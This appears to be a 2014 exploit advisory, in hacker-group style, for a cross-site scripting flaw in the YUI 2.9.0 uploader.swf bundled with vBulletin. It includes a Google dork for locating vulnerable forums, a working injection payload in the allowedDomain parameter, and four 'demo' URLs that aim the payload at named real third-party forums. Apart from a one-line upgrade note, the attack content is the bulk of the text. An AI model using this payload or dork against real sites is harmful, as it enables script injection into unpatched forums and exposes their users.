facebook facebook twitter rss

vBulletin YUI 2.9.0 Cross Site Scripting vulnerability

Author: TUNISIAN CYBER , Published: 21-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: vBulletin YUI 2.9.0 Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"clientscript/yui/uploader/assets/"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com

########################################################################################
+Description:
YUI is a free, open source JavaScript and CSS library for building richly interactive web applications.
Used by vBulletin.
+Exploit:
YUI suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

Demo:
http://fansfoot.com/forum/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.liveworkshop.com/forums/core/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.mjjcommunity.com/forum/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf
http://www.wivesbehindthebadge.org/forums/clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//#sthash.QHn96SD4.dpuf

Patch:
Upgarde to 3.X Version.
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :